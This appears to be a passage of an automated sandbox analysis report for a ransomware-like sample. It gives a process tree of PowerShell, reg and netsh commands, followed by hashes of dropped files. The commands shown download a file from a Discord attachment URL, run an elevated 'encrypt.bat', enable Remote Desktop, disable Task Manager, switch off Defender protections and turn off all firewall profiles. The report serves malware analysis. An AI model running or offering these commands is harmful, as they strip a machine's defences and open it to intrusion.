                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                      8⤵
                                                                      • Blocklisted process makes network request
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3496
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1200
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                        9⤵
                                                                          PID:3480
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                            10⤵
                                                                              PID:1936
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                              10⤵
                                                                                PID:4056
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                10⤵
                                                                                  PID:4348
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                  10⤵
                                                                                    PID:1992
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4824
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1624
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5756
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5460
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5896
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode disable
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:3748
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode mode=DISABLE
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:3280
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set currentprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:6044
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set domainprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2224
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set privateprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:1064
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set publicprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:840
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set allprofiles state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:396
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5664
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5696
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1936
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5768
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4816
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2492
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                    10⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4304
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5108
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                      11⤵
                                                                                        PID:5068
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                          12⤵
                                                                                            PID:2852
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                            12⤵
                                                                                              PID:936
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                              12⤵
                                                                                                PID:5584
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                12⤵
                                                                                                  PID:840
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1020
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1768
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5240
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2864
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3360
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode disable
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:6048
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3884
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:5136
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set domainprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2912
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set privateprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:5756
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set publicprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3484
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set allprofiles state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:1848
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2480
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5912
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                              10⤵
                                                                                              • Sets desktop wallpaper using registry
                                                                                              PID:5368
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                              10⤵
                                                                                                PID:1804
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                            8⤵
                                                                                            • Sets desktop wallpaper using registry
                                                                                            PID:1844
                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                            8⤵
                                                                                              PID:2376
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                          6⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:3580
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          6⤵
                                                                                            PID:1012
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                        4⤵
                                                                                        • Sets desktop wallpaper using registry
                                                                                        PID:4408
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                        4⤵
                                                                                          PID:756
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3112
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:5100

                                                                                      Network

                                                                                            MITRE ATT&CK Enterprise v15

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\Encrypt\encrypt.bat

                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              7a2773f461b2f4672ceb202de1104e08

                                                                                              SHA1

                                                                                              cbcab3b011eddb0b5af6dcfee171511efc2bb9c3

                                                                                              SHA256

                                                                                              522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695

                                                                                              SHA512

                                                                                              df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b

                                                                                            • C:\Encrypt\encrypt.html

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              60722a327960e4b4f5d967101a72ed06

                                                                                              SHA1

                                                                                              04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e

                                                                                              SHA256

                                                                                              3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd

                                                                                              SHA512

                                                                                              98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                              SHA1

                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                              SHA256

                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                              SHA512

                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              439b5e04ca18c7fb02cf406e6eb24167

                                                                                              SHA1

                                                                                              e0c5bb6216903934726e3570b7d63295b9d28987

                                                                                              SHA256

                                                                                              247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

                                                                                              SHA512

                                                                                              d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              a8e767fd33edd97d306efb6905f93252

                                                                                              SHA1

                                                                                              a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

                                                                                              SHA256

                                                                                              c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

                                                                                              SHA512

                                                                                              07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\09e70805-8641-4e88-83bf-28ff3a9cf2c1.tmp

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              8d262936f025e6e0e43279e26a74f814

                                                                                              SHA1

                                                                                              67a850a2fbe1d33d4abdc06341ea46677458a686

                                                                                              SHA256

                                                                                              a887ab7dc1193f0fc2f3811020bdf86c2db432bb350c506f281ca4a957f431b8

                                                                                              SHA512

                                                                                              1efb8958e92e8a87ae51387a2746eaec512329b589e8354a8b9175ecc9f9f4274eb4d5ebba672cd1a5617fdb90644c906c1a02e165651f1300a82afd37a3c960

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              44c26cbaf88913355d7abf2a66730ff7

                                                                                              SHA1

                                                                                              dc0cb90a3fe0690dc705f42233e1830ce65aba65

                                                                                              SHA256

                                                                                              fdc26ba3a857cdbc139bed687128f1392a58833abf1fee87f1ed9a1419212543

                                                                                              SHA512

                                                                                              be282aa6f8830e8037d15969424e51c69d615c0ca02e68108d67b505c32709c38faec1ac2e2398bbab0c2392fa632b58a7173e92adf78793937a3ef13db4f531

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              5KB

                                                                                              MD5

                                                                                              5903dce331aa080fc070d7a01cb096a0

                                                                                              SHA1

                                                                                              bf4ab928de5cdd5709b8e878003063dfa2f7d664

                                                                                              SHA256

                                                                                              237f87410533eb1026c04fd11ccce10ff4eb46df187f654f8845b13c60722cd0

                                                                                              SHA512

                                                                                              ad0ef4b4cb74e7a70f7dc32545b86d513c2f16f1b6f759d3335937929dc7dbc732dc274a6e2e7d93bed5a3e363cb10af1fb7badedfecd4c63a7a287e9a1f90e7

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              1fafccc6562a08ffbb2ed854da54fd32

                                                                                              SHA1

                                                                                              f364282248ed53ebed1823b0eb9e0cafb0915683

                                                                                              SHA256

                                                                                              411be2ff7862c47b500306798def07d106a23ef68637064e6a9f192c4f8ebc7f

                                                                                              SHA512

                                                                                              af31cf64e6ecd23ea31946ab8ada4d382690b64c396f408ae59ed70dc97726ed01cc769cd3ef39db48bcb7d4fd173d1e35321206f69a3939ffd56ef6ef0634ea

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                              Filesize

                                                                                              16B

                                                                                              MD5

                                                                                              6752a1d65b201c13b62ea44016eb221f

                                                                                              SHA1

                                                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                              SHA256

                                                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                              SHA512

                                                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              35a59a7f006e394c1f7d3cff3ba28e15

                                                                                              SHA1

                                                                                              6fcc60038f86ede4c4bc75b35bb10e3d98295e69

                                                                                              SHA256

                                                                                              5042f38ff3798f608d7df292d16b9890116f60271332f338dabac56020ce8f2e

                                                                                              SHA512

                                                                                              27a11d0430a03174c37df04c37389889982fea0ffeaf2070cac4c8a5b1e6bcdd7dbb13c2e4cd2d7fb2021be8676768abc14d35e8d4b20f70ccf829b4e0637528

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              580197daef293a1ee72e0d5e7f7c5183

                                                                                              SHA1

                                                                                              2dc52c3c785cad4023ebca6ea050560933b80e6d

                                                                                              SHA256

                                                                                              17470106498c1d2be3a53d9313a0eed6e16ab11b728140edc3c2439970dc848a

                                                                                              SHA512

                                                                                              ffe174ac9ce0ccf3877f07551dfbd7d8f77dc184e927ab48edf189b3b1571f1f1b52f9c6acb44c07ec58669fdee109e7d76f78c86702f0ca67c3e0b1c59c677e

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              49baae818d3148742759e52ed3f4ac47

                                                                                              SHA1

                                                                                              63b94819cf5409f862852a3a084fb274a3af7f93

                                                                                              SHA256

                                                                                              fceccb2023c8aaae9b80282bb9c7d95078b40aa727e3bc2e3b93533c5e4667dc

                                                                                              SHA512

                                                                                              b7d0db094fc8939e613e55533b5f7fc2c7d6679a1f3251d3704fd1317824a2d2527f6a895f925ca372458886715a5e48c5fe19ca16befe9eacfea8efdc2a6949

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              6d42b6da621e8df5674e26b799c8e2aa

                                                                                              SHA1

                                                                                              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                              SHA256

                                                                                              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                              SHA512

                                                                                              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              eb1ad317bd25b55b2bbdce8a28a74a94

                                                                                              SHA1

                                                                                              98a3978be4d10d62e7411946474579ee5bdc5ea6

                                                                                              SHA256

                                                                                              9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

                                                                                              SHA512

                                                                                              d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              3072fa0040b347c3941144486bf30c6f

                                                                                              SHA1

                                                                                              e6dc84a5bd882198583653592f17af1bf8cbfc68

                                                                                              SHA256

                                                                                              da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

                                                                                              SHA512

                                                                                              62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              ef647504cf229a16d02de14a16241b90

                                                                                              SHA1

                                                                                              81480caca469857eb93c75d494828b81e124fda0

                                                                                              SHA256

                                                                                              47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

                                                                                              SHA512

                                                                                              a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              ba169f4dcbbf147fe78ef0061a95e83b

                                                                                              SHA1

                                                                                              92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                              SHA256

                                                                                              5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                              SHA512

                                                                                              8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              d8cb3e9459807e35f02130fad3f9860d

                                                                                              SHA1

                                                                                              5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                                              SHA256

                                                                                              2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                                              SHA512

                                                                                              045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              9bc110200117a3752313ca2acaf8a9e1

                                                                                              SHA1

                                                                                              fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

                                                                                              SHA256

                                                                                              c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

                                                                                              SHA512

                                                                                              1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              15dde0683cd1ca19785d7262f554ba93

                                                                                              SHA1

                                                                                              d039c577e438546d10ac64837b05da480d06bf69

                                                                                              SHA256

                                                                                              d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                              SHA512

                                                                                              57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              60945d1a2e48da37d4ce8d9c56b6845a

                                                                                              SHA1

                                                                                              83e80a6acbeb44b68b0da00b139471f428a9d6c1

                                                                                              SHA256

                                                                                              314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

                                                                                              SHA512

                                                                                              5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              10890cda4b6eab618e926c4118ab0647

                                                                                              SHA1

                                                                                              1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

                                                                                              SHA256

                                                                                              00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

                                                                                              SHA512

                                                                                              a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              0256bd284691ed0fc502ef3c8a7e58dc

                                                                                              SHA1

                                                                                              dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

                                                                                              SHA256

                                                                                              e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

                                                                                              SHA512

                                                                                              c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              8f5c85fab64f90c57d834907d69907a5

                                                                                              SHA1

                                                                                              d0bb6e6a0c862d78a832120431c80052cd872d6d

                                                                                              SHA256

                                                                                              925ead1306dc5b455fee2c38d89b3015487bcd6cb5268d5f3cf2b8ba5e8a5c07

                                                                                              SHA512

